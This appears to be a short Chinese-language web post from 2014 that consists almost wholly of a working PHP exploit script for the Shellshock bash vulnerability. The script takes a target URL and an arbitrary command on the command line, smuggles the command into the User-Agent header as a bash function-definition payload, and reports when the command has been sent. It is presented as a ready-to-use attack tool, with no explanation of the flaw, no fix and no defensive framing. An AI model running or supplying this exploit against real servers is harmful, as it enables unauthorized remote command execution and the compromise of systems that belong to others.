bash任意代码执行漏洞EXP

时间:2014-09-25 20:52:20 +0800

< ?php
error_reporting(0);
if(!defined('STDIN')) die("Please run it through command-line!n");
$x  = getopt("u:c:");
if(!isset($x['u']) || !isset($x['c']))
{
die("Usage: ".$_SERVER['PHP_SELF']." -u URL -c cmdn");

}
$url = $x['u'];
$cmd = $x['c'];

  $context = stream_context_create(
    array(
      'http' => array(
        'method'  => 'GET',
        'header'  => 'User-Agent: () { :;}; /bin/bash -c "'.$cmd.'"'
      )
    )
  );

  if(!file_get_contents($url, false, $context) && strpos($http_response_header[0],"500") > 0)
  die("Command sent to the server!n");
  else
  die("Connection Errorn");
?>
×

Subscribe

The latest tutorials sent straight to your inbox.